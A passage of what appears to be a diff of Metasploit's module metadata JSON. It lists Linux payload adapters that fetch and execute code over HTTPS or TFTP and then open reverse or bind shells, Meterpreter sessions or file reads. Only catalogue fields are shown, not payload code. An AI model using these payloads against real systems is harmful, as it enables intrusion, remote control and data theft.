"adapted_refname": "linux/x86/metsvc_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/metsvc_reverse_tcp": { - "name": "HTTPS Fetch, Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/read_file": { - "name": "HTTPS Fetch, Linux Read File", - "fullname": "payload/cmd/linux/https/x86/read_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hal" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/read_file", - "staged": false - }, - "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/https/x86/shell/bind_nonx_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/https/x86/shell/bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/https/x86/shell/bind_tcp_uuid": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/https/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/https/x86/shell/find_tag": { - "name": "HTTPS Fetch, Linux Command Shell, Find Tag Stager", - "fullname": "payload/cmd/linux/https/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/find_tag", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/https/x86/shell/reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/https/x86/shell/reverse_nonx_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/https/x86/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/https/x86/shell/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/https/x86/shell_bind_ipv6_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_bind_tcp_random_port": { - "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Geyslan G. Bem ", - "Aleh Boitsau " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_find_port": { - "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/https/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_find_port", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_find_tag": { - "name": "HTTPS Fetch, Linux Command Shell, Find Tag Inline", - "fullname": "payload/cmd/linux/https/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_find_tag", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle ", - "joev " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/x86/shell_reverse_tcp_ipv6": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Matteo Malvica " - ], - "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack " - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/aarch64/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/tftp/aarch64/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": 